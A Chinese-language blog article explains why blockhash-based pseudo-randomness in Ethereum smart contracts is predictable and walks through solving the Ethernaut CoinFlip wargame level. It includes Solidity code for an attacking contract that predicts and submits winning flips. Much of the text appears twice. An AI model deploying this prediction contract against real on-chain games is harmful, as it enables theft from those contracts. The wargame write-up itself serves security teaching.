您现在的位置是:首页 > 区块链 > 区块链技术区块链技术
如何防止滥用区块链智能合约中的伪随机性
2019-06-18来源:作者:经济常识笔记栏目:区块链技术
简介如何防止滥用智能合约中的伪随机性,在计算智能合约中的“随机性”时(或者甚至从现有的随机数库继承)时要格外注意。如果您使用随机性来确定比赛获胜者,请记住,对手可以轻松猜出随机结果并破解您的游戏!
以太坊如何产生随机性
以太坊区块链上没有真正的随机性,只有被认为“足够好”的随机生成器。
开发人员目前通过在以太坊中的散列独特性或难以篡改性的变量创建伪随机性。此类变量的示例包括transaction timestamp,sender address,block height。
以太坊提供两种主要的加密散列函数,即SHA-3和较新的KECCAK256,它们对这些输入变量的串联字符串进行散列。
最终生成的哈希被转换为一个大整数,然后由n修改。这是为了得到一组离散的概率整数,在0到n的期望范围内。
请注意,在我们的Ethernaut练习中,n=2代表硬币翻转的两面。
这种在智能合约中导出伪随机性的方法很容容易受到攻击。如果知道输入的黑客可以结此猜出“随机”结果。
这就是解决CoinFlip级别的关键。在这里,确定硬币翻转的输入变量对于您来说是公开的。
详情演练
我们来创建一个恶意智能合约,检查硬币翻转的结果。
只有当你正确猜到了结果时,你才能调用真实合约的翻转(bool _guess)函数。
1、在Remix IDE中,创建一个与CoinFlip.sol相关的恶意合同:
2、实现hackFlip()函数,使用与原始智能合约相同的逻辑和输入变量来预测翻转结果。既然你知道blockhash和block.number,那么你就能准确预测正确的_guess。
function hackFlip(bool _guess) public {
// pre-deteremine the flip outcome
uint256 blockValue = uint256(block.blockhash(block.number-1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
// If I guessed correctly, submit my guess
if (side == _guess) {
originalContract.flip(_guess);
} else {
// If I guess incorrectly, submit the opposite
originalContract.flip(!_guess);
}
}
3、调用你的hackFlip()函数10次。当您做出正确的猜测时,原始智能合约的consecutiveWins计数器应该逐步增加。
关键安全要点
没有真的随机性。
在计算智能合约中的“随机性”时(或者甚至从现有的随机数库继承)时要格外注意。如果您使用随机性来确定比赛获胜者,请记住,对手可以轻松猜出随机结果并破解您的游戏!
以太坊区块链上没有真正的随机性,只有被认为“足够好”的随机生成器。
开发人员目前通过在以太坊中的散列独特性或难以篡改性的变量创建伪随机性。此类变量的示例包括transaction timestamp,sender address,block height。
以太坊提供两种主要的加密散列函数,即SHA-3和较新的KECCAK256,它们对这些输入变量的串联字符串进行散列。
最终生成的哈希被转换为一个大整数,然后由n修改。这是为了得到一组离散的概率整数,在0到n的期望范围内。
请注意,在我们的Ethernaut练习中,n=2代表硬币翻转的两面。
这种在智能合约中导出伪随机性的方法很容容易受到攻击。如果知道输入的黑客可以结此猜出“随机”结果。
这就是解决CoinFlip级别的关键。在这里,确定硬币翻转的输入变量对于您来说是公开的。
详情演练
我们来创建一个恶意智能合约,检查硬币翻转的结果。
只有当你正确猜到了结果时,你才能调用真实合约的翻转(bool _guess)函数。
1、在Remix IDE中,创建一个与CoinFlip.sol相关的恶意合同:
contract hackCoinFlip {
CoinFlip public originalContract = CoinFlip(
"your instance address");
uint256 FACTOR = 578960446186580977117854925043439539266349923
32820282019728792003956564819968;
function hackFlip(bool _guess) public {
//TODO
}
}
2、实现hackFlip()函数,使用与原始智能合约相同的逻辑和输入变量来预测翻转结果。既然你知道blockhash和block.number,那么你就能准确预测正确的_guess。
function hackFlip(bool _guess) public {
// pre-deteremine the flip outcome
uint256 blockValue = uint256(block.blockhash(block.number-1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
// If I guessed correctly, submit my guess
if (side == _guess) {
originalContract.flip(_guess);
} else {
// If I guess incorrectly, submit the opposite
originalContract.flip(!_guess);
}
}
3、调用你的hackFlip()函数10次。当您做出正确的猜测时,原始智能合约的consecutiveWins计数器应该逐步增加。
关键安全要点
没有真的随机性。
在计算智能合约中的“随机性”时(或者甚至从现有的随机数库继承)时要格外注意。如果您使用随机性来确定比赛获胜者,请记住,对手可以轻松猜出随机结果并破解您的游戏!
很赞哦! ()
上一篇:正确理解区块链技术很重要
下一篇:公链的通证之路
随机图文
如何防止滥用区块链智能合约中的伪随机性
如何防止滥用智能合约中的伪随机性,在计算智能合约中的“随机性”时(或者甚至从现有的随机数库继承)时要格外注意。如果您使用随机性来确定比赛获胜者,请记住,对手可以轻松猜出随机结果并破解您的游戏!
「区块链技术」有必要掌握的基本上链技巧
「区块链技术」有必要掌握的基本上链技巧 今天手把手教你如何在区块链上“刻字”,也就是上链。
区块链技术可最大程度简化税收系统
区块链技术可最大程度简化税收系统 区块链被用于简化税收和融资活动,其方式可能对现金流、收入和利润产生直接影响。通过减少对第三方支持的依赖,区块链可以帮助降低甚至消除交易费用和错误。
区块链技术——进入数字化时代的必由之路
区块链技术是进入数字化时代的必由之路,当前经济全球化进入新阶段,国际金融、科技领域的竞争愈发激烈,区块链等新兴技术必然引起世界大国的关注。目前,许多国家都着手研究区块链技术的可行性和相关应用落地。
